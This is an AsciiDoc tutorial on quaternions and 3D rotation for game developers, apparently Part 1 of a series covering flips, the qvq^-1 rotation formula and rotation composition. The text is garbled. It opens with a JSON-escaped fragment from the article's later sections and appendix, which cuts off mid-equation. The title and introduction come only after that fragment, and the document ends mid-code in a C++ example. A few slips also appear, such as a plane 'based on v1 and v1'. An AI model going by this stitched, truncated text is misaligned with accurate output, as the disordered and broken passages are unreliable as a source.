https:\/\/en.wikipedia.org\/wiki\/Quaternion#Definition[Wiki page] has a very straight forward introduction.\n\nWe are not going to use this general quaternion multiplication in Part 1. Here we only need to know a simpler form, the multiplication of flips. 
Let stem:[q_a=(\\vec{a},0)], stem:[q_b=(\\vec{b},0)] then\n\n[stem]\n++++\n{q_a}{q_b}=(\\vec{a},0)(\\vec{b},0)=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\n++++\n\nIt is naturally derived from the general form, and we will be only using this multiplication in Part 1.\n\nWith flip multiplication defined, we can rewrite our flip composition rule again:\n\n*_Any 3D rotation stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\\vec{a},0)] and stem:[q_b=(\\vec{b},0)], such that_*\n[stem]\n++++\nq=-{q_b}{q_a}\n++++\n*_where stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}]._*\n\nYou might be thinking why it is not stem:[q= {q_a}{q_b}] instead. We will show where the order and the negative sign coming from in the proof.\n\nstem:[\\vec{a}\u00b7\\vec{b}=cos<\\vec{a},\\vec{b}>\\left|\\vec{a}\\right|\\left|\\vec{b}\\right|=cos\\frac{\u03b8}{2}]. Since stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and stem:[\\left|\\vec{v}\\right|=1], we have stem:[\\vec{a}\u00d7\\vec{b}=sin<\\vec{a},\\vec{b}>\\left|\\vec{a}\\right|\\left|\\vec{b}\\right|\\vec{v}=sin\\frac{\u03b8}{2}\\vec{v}].\n\nIf you are not sure about the direction of the cross product, see Figure 2.\n\n[stem]\n++++\n\\begin{align*}\nq&=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})\\\\\n&=(\\vec{a}\u00d7\\vec{b},\\vec{a}\u00b7\\vec{b})\\\\\n&=-(-\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\\\\\n&=(\\vec{b}\u00d7\\vec{a},-\\vec{a}\u00b7\\vec{b})\\\\\n&=-{q_b}{q_a}\n\\end{align*}\n++++\n\nHere you can also clearly see why we are using stem:[sin\u2061\\frac{\u03b8}{2}] and stem:[cos\u2061\\frac{\u03b8}{2}] in quaternions.\n\nOne thing I need to mention here is the negation of a quaternion. stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], then\n\n[stem]\n++++\n\\begin{align*}\n{-q}&=(-sin\u2061\\frac{\u03b8}{2}\\vec{v},-cos\u2061\\frac{\u03b8}{2})\\\\\n&=(-sin\u2061\\frac{2\u03c0-\u03b8}{2}\\vec{v},cos\u2061\\frac{2\u03c0-\u03b8}{2})\\\\\n&=(sin\u2061\\frac{-(2\u03c0-\u03b8)}{2}\\vec{v},cos\u2061\\frac{-(2\u03c0-\u03b8)}{2})\\\\\n\\end{align*}\n++++\n\nRecall that stem:[sin\u2061\u03b8=sin(\u03c0-\u03b8)] and stem:[-cos\u2061\u03b8=cos(\u03c0-\u03b8)], then stem:[-sin\u2061\u03b8=sin(-\u03b8)] and stem:[cos\u2061\u03b8=cos(-\u03b8)].\n\nIt shows that stem:[-q] is a rotation along axis stem:[\\vec{v}] of angle stem:[-(2\u03c0-\u03b8)], which is exactly the same rotation as stem:[q]. For example if stem:[\u03b8=90^{\\circ}] then stem:[-(2\u03c0-\u03b8)=-270^{\\circ}], rotate stem:[90^{\\circ}] along axis stem:[\\vec{v}] is the same as rotate stem:[270^{\\circ}] degree but in the opposite direction along the same axis stem:[\\vec{v}]. \n\nThe fact that stem:[q] and stem:[\u2013q] represents the same rotation is usually called double-cover. However in our calculation I don\u2019t want you to simply think stem:[q] and stem:[\u2013q] are the same. They are different in quaternion space, even though they map to the same 3D rotation. The negative sign of the flip composition needs to be there.\n\nThe order of stem:[q=-{q_b}{q_a}] on the right hand side is important. It means flip along stem:[\\vec{a}] first and then stem:[\\vec{b}]. 
Actually all unit quaternion multiplication needs to be \u201cread\u201d from right to left when we are thinking about the order of applying those rotations.\n\n---\n.Side Note\n****\nWe can however get rid of the negative sign by choosing stem:[\\vec{a}] and stem:[\\vec{b}] differently.\n\n_Any 3D rotation stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\\vec{a},0)] and stem:[q_b=(\\vec{b},0)], such that\nstem:[q={q_b}{q_a}]\nwhere stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}-\u03c0]._\n\nIt becomes harder to visualize stem:[\\vec{a}] and stem:[\\vec{b}] if we go this way, and the negative sign does not really introduce a lot of difficulties, so we will stick with that negative sign in this article.\n\n****\n---\n\n\n=== Flip Vector\n\nGiven a flip stem:[q_a=(\\vec{a},0)] and vector stem:[\\vec{v}], we are ready to calculate the result of the flip stem:[\\vec{v'}].\n\n.Figure 3\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig3.png[, 400,align=\"center\"]\n\nAccording to flip definition, stem:[\\vec{v}], stem:[\\vec{a}] and stem:[\\vec{v'}] are on the same plane, and the angle stem:[<\\vec{v},\\vec{a}>=<\\vec{a},\\vec{v'}>].\n\nIf we treat stem:[\\vec{v}] and stem:[\\vec{v'}] as the axis of flip stem:[q_v=(\\vec{v},0)] and stem:[q_v'=(\\vec{v'},0)]. From our flip composition rule, flipping along axis stem:[\\vec{v}] then stem:[\\vec{a}] should give us the same rotation as flipping along axis stem:[\\vec{a}] then stem:[\\vec{v'}]. \n\nWe can actually calculate the result rotation. Let stem:[<\\vec{v},\\vec{a}>=<\\vec{a},\\vec{v'}>=\\frac{\u03b8}{2}], stem:[\\vec{u}=\\frac{\\vec{v}\u00d7\\vec{a}}{\\left|\\vec{v}\u00d7\\vec{a}\\right|}=\\frac{\\vec{a}\u00d7\\vec{v'}}{\\left|\\vec{a}\u00d7\\vec{v'}\\right|}]. Then the result rotation is of angle stem:[\u03b8] along axis stem:[\\vec{u}].\n\n[stem]\n++++\n\\begin{align*}\nq&=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})\\\\\n&=-{q_a}{q_v}\\\\\n&=-{q_v'}{q_a}\n\\end{align*}\n++++\n\nThis gives stem:[{q_v'}{q_a}={q_a}{q_v}].\n\n(Here stem:[\\left|\\vec{v}\u00d7\\vec{a}\\right|=\\left|\\vec{a}\u00d7\\vec{v'}\\right|=sin\\frac{\u03b8}{2}].If you are not sure what\u2019s going on here, go back \u201cFlip Composition\u201d and read the proof)\n\nNow we need to introduce the inverse of a quaternion. The inverse of stem:[q] is denoted as stem:[q^{-1}], such that stem:[qq^{-1}=q^{-1}q=(\\vec{0},1)]. \n\nstem:[I=(\\vec{0},1)] is called identity quaternion, means no rotation at all. You can think of stem:[I=(sin\u20610\\vec{v},cos\u20610)], which means rotating stem:[0^{\\circ}] along any axis stem:[\\vec{v}]. We haven\u2019t gone into quaternion multiplication or rotation composition, but it\u2019s not hard to see for any quaternion stem:[q], stem:[qI=Iq=q].\n\nIn the case of unit quaternion, the idea of inversed quaternion is if you apply a rotation, then apply its inverse, the result should be no rotation at all. And it is the same if you apply an inversed rotation then apply the original one.\n\nFor any unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], then stem:[q^{-1}=(-sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. 
You can understand this in two ways, either stem:[q^{-1}=(sin\u2061\\frac{\u03b8}{2}(-\\vec{v}),cos\u2061\\frac{\u03b8}{2})] or stem:[q^{-1}=(sin\u2061\\frac{-\u03b8}{2}\\vec{v},cos\u2061\\frac{-\u03b8}{2})]. stem:[q^{-1}] is either a rotation of angle stem:[\u03b8] along axis stem:[-\\vec{v}], or a rotation of angle stem:[\u2013\u03b8] along axis stem:[\\vec{v}]. Either way it will cancel out the original rotation.\n\nI will give a quick proof in the case of flip. You can try extend this proof to general unit quaternion. If stem:[q_a=(\\vec{a},0)], stem:[q_a^{-1}=(-\\vec{a},0)], we have\n\n[stem]\n++++\n{q_a}{q_a^{-1}}=(\\vec{a}\u00d7-\\vec{a},-(\\vec{a}\u00b7-\\vec{a}))=(\\vec{0},1)\n++++\n\n(Make sure you understand the difference between stem:[q^{-1}] and stem:[\u2013q]. Read \u201cFlip Composition\u201d about quaternion negation if you are not sure.) \n\nWe can go back to previous result of flipping vector stem:[{q_v'}{q_a}={q_a}{q_v}]. Apply inverse flip of q_a on both side, the equation becomes\n\n[stem]\n++++\n\\begin{align*}\n{q_v'}{q_a}{q_a^{-1}}&={q_a}{q_v}{q_a^{-1}}\\\\\nq_v'&={q_a}{q_v}{q_a^{-1}}\n\\end{align*}\n++++ \n\nThis provides us a way to calculate the result of flip. Since we only need the vector part of the result, we can denote this as \n\n[stem]\n++++\n\\vec{v'}={q_a}\\vec{v}{q_a^{-1}}\n++++\n\nWhen we put a vector stem:[\\vec{v}] in quaternion multiplication, we are implicitly making that vector the axis of a flip to stuff it into a quaternion stem:[(\\vec{v},0)]. This is how the \u201csandwich\u201d multiplication form comes from, but only in the form of flip. We will prove that our result holds the same for any rotation in the next section.\n\n=== Rotate Vector\n\nWe know any 3D rotation stem:[q] can be broken down into 2 flips stem:[q= -{q_b}{q_a}], which means flipping along stem:[\\vec{a}] first and then stem:[\\vec{b}]. So for a vector stem:[\\vec{v}], we apply the first flip and get\n[stem]\n++++\n\\vec{v'}={q_a}\\vec{v}{q_a^{-1}}\n++++\nThen we apply the second flip stem:[\\vec{v'}] and get\n[stem]\n++++\n\\vec{v''}={q_b}\\vec{v'}{q_b^{-1}}\n++++\nSo the final result is\n[stem]\n++++\n\\begin{align*}\n\\vec{v''}&={q_b}{q_a}\\vec{v}{q_a^{-1}}{q_b^{-1}}\\\\\n&=({q_b}{q_a})\\vec{v}({q_b}{q_a})^{-1}\\\\\n&=(-q)\\vec{v}(-q^{-1})\\\\\n&=q\\vec{v}q^{-1}\\\\\n\\end{align*}\n++++ \nHere you can see why stem:[q= -{q_b}{q_a}] needs to be in this order.\n\nOne thing we need to prove\n[stem]\n++++\n\\begin{align*}\n{q_a^{-1}}{q_b^{-1}}&=(-\\vec{a},0)(-\\vec{b},0)\\\\\n&=(-\\vec{a}\u00d7-\\vec{b},-(-\\vec{a})\u00b7(-\\vec{b}))\\\\\n&=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\\\\\n&=(-\\vec{b}\u00d7\\vec{a},-\\vec{b}\u00b7\\vec{a})\\\\\n&=({q_b}{q_a})^{-1}\n\\end{align*}\n++++ \nAt this point, we fully explained how to rotate a vector using quaternion.\n\n=== Rotation Composition\n\nGiven rotation stem:[q_1] and stem:[q_2], from the formula in the previous section, if we rotate vector stem:[\\vec{v}] by stem:[q_1] first then by stem:[q_2], we have\n[stem]\n++++\n\\begin{align*}\n\\vec{v'}&={q_1}\\vec{v}{q_1^{-1}}\\\\\n\\vec{v''}&={q_2}\\vec{v'}{q_2^{-1}}\\\\\n&={q_2}{q_1}\\vec{v}{q_1^{-1}}{q_2^{-1}}\\\\\n&=({q_2}{q_1})\\vec{v}({q_2}{q_1})^{-1}\\\\\n\\end{align*}\n++++ \nIt is the same as apply the combined rotation stem:[q={q_2}{q_1}]. 
Be careful about the multiplication order.\n\nAgain we need to prove stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}], but we will do this later.\n\nWhat does it really mean to combine 2 rotations, can we visualize the rotation axis and angle of the result? By converting rotations to flips we actually do that.\n\nLet stem:[q_1=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})], stem:[q_2=(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})], we need to choose a special flip break down, such that they share one flip: stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}]. \n\nCan we find such a break down? Remember the rule of flip composition requires the flip axis to be perpendicular to the rotation axis, that is stem:[\\vec{c}\u00b7\\vec{v_1}=0], stem:[\\vec{c}\u00b7\\vec{v_2}=0], we can choose stem:[\\vec{c}=\\frac{\\vec{v_1}\u00d7\\vec{v_2}}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}]. \n\nBased on stem:[\\vec{c}] we can find out the other two axes: rotate stem:[\\vec{c}] along axis stem:[\\vec{v_1}] by angle stem:[-\\frac{\u03b8_1}{2}] results in stem:[\\vec{a}]; rotate stem:[\\vec{c}] along axis stem:[\\vec{v_2}] by angle stem:[\\frac{\u03b8_2}{2}] results in stem:[\\vec{b}]. This process is demonstrated in Figure 4.\n\nNow we have stem:[\\vec{a}\u00b7\\vec{v_1}=0], stem:[\\vec{c}\u00b7\\vec{v_1}=0], stem:[<\\vec{a},\\vec{c}>=\\frac{\u03b8_1}{2}] and stem:[\\vec{c}\u00b7\\vec{v_2}=0], stem:[\\vec{b}\u00b7\\vec{v_2}=0], stem:[<\\vec{c},\\vec{b}>=\\frac{\u03b8_2}{2}]. Our break down stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}] is valid. The combined rotation can be written as\n[stem]\n++++\n\\begin{align*}\nq&={q_2}{q_1}\\\\\n&=(-{q_b}{q_c})(-{q_c}{q_a})\\\\\n&={q_b}({q_c}{q_c}){q_a}\\\\\n&=-{q_b}{q_a}\\\\\n\\end{align*}\n++++ \nHere we need to prove this\n[stem]\n++++\n{q_c}{q_c}=(\\vec{c},0)(\\vec{c},0)=(\\vec{c}\u00d7\\vec{c},-(\\vec{c}\u00b7\\vec{c}))=(\\vec{0},-1)=-I\n++++ \nIt shows that the combined rotation can be composed by flip stem:[q_a] and stem:[q_b], which tells the combined rotation is a rotation of angle stem:[2<\\vec{a},\\vec{b}>] along axis stem:[\\vec{u}=\\frac{\\vec{a}\u00d7\\vec{b}}{\\left|\\vec{a}\u00d7\\vec{b}\\right|}].\n\n.Figure 4\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig4.png[, 400,align=\"center\"]\nIn Figure 4, Blue plane is based on stem:[\\vec{v_1}] and stem:[\\vec{v_1}], stem:[\\vec{c}] is perpendicular to that plane. \nOrange plane is based on stem:[\\vec{a}] and stem:[\\vec{b}], the result rotation axis stem:[\\vec{u}] is perpendicular to that plane.\n\nWith the same method, let\u2019s prove the thing we left out:\n[stem]\n++++\n\\begin{align*}\n{q_1^{-1}}{q_2^{-1}}&=(-{q_c}{q_a})^{-1}(-{q_b}{q_c})^{-1}\\\\\n&={q_a^{-1}}{q_c^{-1}}{q_c^{-1}}{q_b^{-1}}\\\\\n&=-{q_a^{-1}}{q_b^{-1}}\\\\\n&=(-{q_b}{q_a})^{-1}\\\\\n&=({q_b}{q_c}{q_c}{q_a})^{-1}\\\\\n&=({q_2}{q_1})^{-1}\\\\\n\\end{align*}\n++++ \n\n=== Summary of Part 1\n\nIn Part 1, we covered the definition of quaternion stem:[q=(x,y,z,w)], the vector form of quaternion stem:[q=(\\vec{v},w)], unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] and how it is used to represent a rotation.\n\nWe also talked about negation of quaternion stem:[\u2013q], and its double cover property; the inverse of quaternion stem:[q^{-1}] and identity quaternion stem:[I=(\\vec{0},1)].\n\nWe use quaternion to represent flip stem:[q_a=(\\vec{a},0)], and derive the rule of flip composition stem:[q=-{q_b}{q_a}]. 
Based on this rule, we visualized and proved how quaternion rotates a vector by stem:[\\vec{v'}=q\\vec{v}q^{-1}] and how rotation gets composed by stem:[q={q_2}{q_1}].\n\nWe slightly touched quaternion multiplication, and we proved an important equation stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}].\n\n=== Appendix: Derive Quaternion Multiplication\n\nThis part is not very important for understanding quaternion. It is a bit calculation heavy and is more for fun. Feel free to skip.\n\nWe can actually derive the general quaternion multiplication from this special flip break down. That is if we define flip multiplication stem:[{q_a}{q_b}=(\\vec{a},0)(\\vec{b},0)=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})] directly, we can proof what general quaternion multiplication stem:[{q_1}{q_2}=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})] would look like.\n\nHere are some equations we will be using:\n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00d7(\\vec{b}\u00d7\\vec{c})&=(\\vec{a}\u00b7\\vec{c})\\vec{b}-(\\vec{a}\u00b7\\vec{b})\\vec{c}\\\\\n(\\vec{a}\u00d7\\vec{b})\u00b7(\\vec{c}\u00d7\\vec{d})&=(\\vec{a}\u00b7\\vec{c})(\\vec{b}\u00b7\\vec{d})-(\\vec{a}\u00b7\\vec{d})(\\vec{b}\u00b7\\vec{c})\\\\\n(\\vec{a}\u00d7\\vec{b})\u00d7(\\vec{a}\u00d7\\vec{c})&=(\\vec{a}\u00b7(\\vec{b}\u00d7\\vec{c}))\\vec{a}\n\\end{align*}\n++++ \n\nRecall how we choose the flip break down stem:[\\vec{c}=\\frac{\\vec{v_1}\u00d7\\vec{v_2}}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}].\n\nRotate stem:[\\vec{c}] along axis stem:[\\vec{v_1}] by angle stem:[-\\frac{\u03b8_1}{2}] we get\n[stem]\n++++\n\\vec{a}=cos\\frac{-\u03b8_1}{2}\\vec{c} + sin\\frac{-\u03b8_1}{2}(\\vec{v_1}\u00d7\\vec{c})=\\frac{1}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}(cos\\frac{\u03b8_1}{2}(\\vec{v_1}\u00d7\\vec{v_2}) - sin\\frac{\u03b8_1}{2}(\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\n++++\nRotate stem:[\\vec{c}] along axis stem:[\\vec{v_2}] by angle stem:[\\frac{\u03b8_2}{2}] we get\n[stem]\n++++\n\\vec{b}=cos\\frac{\u03b8_2}{2}\\vec{c} + sin\\frac{\u03b8_2}{2}(\\vec{v_2}\u00d7\\vec{c})=\\frac{1}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}(cos\\frac{\u03b8_2}{2}(\\vec{v_1}\u00d7\\vec{v_2}) + sin\\frac{\u03b8_2}{2}(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\n++++\nAnd we will have\n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00b7\\vec{b}&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00b7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))))\\\\\n&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00b7\\vec{v_2}){\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2})\\\\\n&=cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00b7\\vec{v_2})\n\\end{align*}\n++++ \n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00d7\\vec{b}&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7\\vec{v_2})\u00d7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\\\\\n&- sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00d7(\\vec{v_1}\u00d7\\vec{v_2})\\\\\n&- 
= An Easy Way to Understand Quaternion and Rotation: Part 1. Theory
Eric Zhang

:stem: latexmath
:figure-caption!:


Quaternions are widely used in game engines to represent 3D rotation. As a game engineer you might be using quaternions explicitly or implicitly in your daily work, but do you really understand what is going on under the hood when you call “rotate a vector” or “combine two rotations”? Why is rotating a vector stem:[v] by quaternion stem:[q] calculated by a “sandwich” multiplication stem:[qvq^{-1}]? Why is rotating by quaternion stem:[q_1] then stem:[q_2] written in the reversed order stem:[{q_2}{q_1}], and can you visualize the resulting rotation axis and angle?

Understanding quaternions also leads to using them more efficiently. For example, one common situation in game development is that we need an object to face its opposite direction. What we usually would do is get the normal or forward vector, negate it, build a rotation out of it, and assign the rotation to the object. Later in this article we will see how much calculation we need to do in this process. However, with an understanding of quaternions, we only need to do stem:[q=(q.y,-q.x,q.w,-q.z)], and I will show you why.
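As a teaser, here is what that shortcut looks like in code. This is a minimal sketch with a hypothetical `Quat` struct; it assumes the stem:[(x,y,z,w)] component order used throughout this article, and that the turn-around is a stem:[180^{\circ}] rotation applied about the local stem:[\vec{Z}] axis (so the forward axis is assumed perpendicular to stem:[\vec{Z}]). Part 2 explains why the shuffle works.

[source,cpp]
----
#include <cstdio>

// Hypothetical minimal quaternion type, components in (x, y, z, w) order.
struct Quat { float x, y, z, w; };

// Face the opposite direction: a pure component shuffle,
// no trigonometry and no renormalization needed.
Quat FaceOpposite(const Quat& q)
{
    return Quat{ q.y, -q.x, q.w, -q.z };
}

int main()
{
    Quat q{ 0.0f, 0.0f, 0.0f, 1.0f }; // identity rotation
    Quat r = FaceOpposite(q);
    // Prints (0, -0, 1, -0): the 180-degree rotation along Z (note -0 == 0).
    std::printf("(%g, %g, %g, %g)\n", r.x, r.y, r.z, r.w);
    return 0;
}
----

Shuffling components this way is equivalent to multiplying stem:[q] by a fixed stem:[180^{\circ}] quaternion, which is why no square roots or trigonometric functions show up.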
In this article, I will try to avoid touching the algebra structure of quaternions, or having to imagine a 4-dimensional hypersphere. I will start with a special rotation operation, the flip, and use it to visualize quaternions in a more accessible and geometrical way. This article is split into 2 parts. In Part 1 we will talk about the idea of quaternion, and understand and visualize how it rotates a vector and how to compose rotations. In Part 2 we will talk about how to make use of our understanding from Part 1, and how quaternions are used in game engines versus rotation matrices and Euler angles.

I assume you are comfortable with 3D math (vector dot product and cross product) and basic trigonometry.

=== Quaternion Definition

A quaternion is a 4-tuple denoted as stem:[q=(x,y,z,w)]. The length of a quaternion is defined as stem:[\left|q\right| =\sqrt{x^{2}+y^{2}+z^{2}+w^{2}}], just as you would expect from a 4D vector.

In order to represent 3D rotation, we put a constraint on the quaternions we use. But before that I want to introduce Euler’s rotation theorem:

*_Any rotation in 3D space is equivalent to a single rotation of angle stem:[θ] along some axis stem:[\vec{v}]._*

We can use a quaternion to describe this angle-axis rotation: stem:[q=(sin\frac{θ}{2}\vec{v}.x,sin\frac{θ}{2}\vec{v}.y,sin\frac{θ}{2}\vec{v}.z,cos\frac{θ}{2})], or in a more compact form stem:[q=(sin\frac{θ}{2}\vec{v},cos\frac{θ}{2})]. We call this the vector form of a quaternion, and we will use it throughout this article. You might be wondering why we use stem:[\frac{θ}{2}] rather than stem:[θ] directly. I will explain that in a later section.

It is easy to see that the length of this quaternion is stem:[\left|q\right|=\sqrt{sin^{2}\frac{θ}{2}\left|\vec{v}\right|^{2}+cos^{2}\frac{θ}{2}}=1]. (Remember the axis stem:[\vec{v}] is a unit vector, so stem:[\left|\vec{v}\right|=1].) We call stem:[q] a unit quaternion if its length is stem:[\left|q\right|=1]. So we can rewrite Euler’s rotation theorem in quaternion terms:

*_Any 3D rotation is equivalent to a unit quaternion stem:[q] with stem:[\left|q\right|=1]._*

---
.Side Note
****
This claim actually has 2 sides. Let me be a little more precise in math terms: 
(1). For any 3D rotation, equivalent to a rotation of angle stem:[θ] along axis stem:[\vec{v}], there exists a unit quaternion stem:[q=(sin\frac{θ}{2}\vec{v},cos\frac{θ}{2})] that describes this rotation. 
(2). Any unit quaternion stem:[q=(x,y,z,w)] describes a rotation of angle stem:[θ=2cos^{-1}w] along axis stem:[\vec{v}=\frac{(x,y,z)}{\sqrt{1-w^{2}}}].

****
---
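The two sides of this claim map directly to the usual conversion routines. Here is a minimal sketch (hypothetical helper names, stem:[(x,y,z,w)] component order); it assumes the axis passed in is already normalized and, for the reverse direction, that stem:[q] is not the identity (otherwise stem:[\sqrt{1-w^{2}}] is zero and any axis works).

[source,cpp]
----
#include <cmath>

struct Vec3 { float x, y, z; };
struct Quat { float x, y, z, w; };

// Side (1): angle-axis -> unit quaternion, q = (sin(theta/2)*v, cos(theta/2)).
// Assumes v is a unit vector.
Quat FromAngleAxis(float theta, const Vec3& v)
{
    float s = std::sin(theta * 0.5f);
    return Quat{ s * v.x, s * v.y, s * v.z, std::cos(theta * 0.5f) };
}

// Side (2): unit quaternion -> angle-axis,
// theta = 2*acos(w), v = (x,y,z) / sqrt(1 - w^2).
// Assumes q is a unit quaternion with w != +/-1.
void ToAngleAxis(const Quat& q, float& theta, Vec3& v)
{
    theta = 2.0f * std::acos(q.w);
    float invLen = 1.0f / std::sqrt(1.0f - q.w * q.w);
    v = Vec3{ q.x * invLen, q.y * invLen, q.z * invLen };
}
----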
From now on, any quaternion stem:[q] used in this article is by default a unit quaternion, and we will use stem:[q] to describe rotations.

=== Rotation and Flip

Now let’s forget quaternions for a minute, and focus on the nature of rotations. This part is the key to understanding quaternion calculation in an easier way.

*_Any 3D rotation can be composed of 2 flips along some axes._*

The reason we want to break down a rotation into flips is that flips are much easier to think about and calculate than a general 3D rotation. We will start from flips and build our way up to understanding rotation.
Here is a loose proof of this idea. We define counter-clockwise as the positive direction of rotation. First consider a special case. We have a rotation stem:[q], which rotates stem:[+90^{\circ}] along axis stem:[\vec{Z}]. Now I claim this rotation is the same as 2 flips along axes stem:[\vec{a}] and stem:[\vec{b}], where both of them are on the XY plane, and the angle from stem:[\vec{a}] to stem:[\vec{b}] is stem:[+45^{\circ}].

.Figure 1 (a)
image::https://github.com/lxjk/lxjk.github.io/raw/master/images/quaternions/fig1.png[, 300,float="right",align="center"]
.Figure 1 (b)
image::https://github.com/lxjk/lxjk.github.io/raw/master/images/quaternions/fig1_b.png[, 300,float="right",align="center"]

We demonstrate this through Figure 1. For any vector stem:[\vec{v}], the result of this rotation is stem:[\vec{v''}], which is the same as flipping stem:[\vec{v}] along axis stem:[\vec{a}] to get stem:[\vec{v'}], and then flipping stem:[\vec{v'}] along axis stem:[\vec{b}] to get stem:[\vec{v''}].

It doesn’t matter where stem:[\vec{a}] and stem:[\vec{b}] are on the XY plane, but the order must be kept. If we choose stem:[\vec{b}] by rotating stem:[\vec{a}] along axis stem:[\vec{Z}] by stem:[+45^{\circ}], with the positive direction we defined above, then we must flip along stem:[\vec{a}] first and then along stem:[\vec{b}] to get our target rotation. The order and the sign of the angle are important: as you can easily see, flipping along stem:[\vec{b}] first and then along stem:[\vec{a}] gives a different result.

It’s not hard to generalize this to a rotation of any angle stem:[θ] along the stem:[\vec{Z}] axis. In that case, the angle from stem:[\vec{a}] to stem:[\vec{b}] is stem:[\frac{θ}{2}].

What if the axis is not the stem:[\vec{Z}] axis but an arbitrary unit vector stem:[\vec{u}]? It turns out to be very straightforward. stem:[\vec{a}] and stem:[\vec{b}] are no longer on the XY plane but on the plane crossing the origin and perpendicular to stem:[\vec{u}], as in Figure 2.

.Figure 2
image::https://github.com/lxjk/lxjk.github.io/raw/master/images/quaternions/fig2.png[, 400,align="center"]

Now we can rewrite our flip composition rule in a more specific form:

*_Any 3D rotation, equivalent to rotating by angle stem:[θ] along axis stem:[\vec{v}], can be represented as a sequence of 2 flips along axes stem:[\vec{a}] and stem:[\vec{b}], such that stem:[\vec{a}·\vec{v}=0], stem:[\vec{b}·\vec{v}=0] and the angle from stem:[\vec{a}] to stem:[\vec{b}] is stem:[<\vec{a},\vec{b}>=\frac{θ}{2}]._*

This representation means that if we fully understand flips, which are easier to visualize, we can fully understand rotations and quaternions, since any quaternion can be broken down into flips.
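Before moving on, we can sanity-check this rule numerically without any quaternions. The sketch below (hypothetical names) uses the standard reflection formula stem:[\vec{v'}=2(\vec{a}·\vec{v})\vec{a}-\vec{v}] for a stem:[180^{\circ}] rotation along a unit axis stem:[\vec{a}], a fact assumed here rather than derived in the article, and reproduces the Figure 1 setup.

[source,cpp]
----
#include <cstdio>

struct Vec3 { double x, y, z; };

double Dot(const Vec3& a, const Vec3& b) { return a.x*b.x + a.y*b.y + a.z*b.z; }

// Flip (180-degree rotation) of v along unit axis a: v' = 2(a.v)a - v.
Vec3 Flip(const Vec3& v, const Vec3& a)
{
    double d = 2.0 * Dot(v, a);
    return Vec3{ d*a.x - v.x, d*a.y - v.y, d*a.z - v.z };
}

int main()
{
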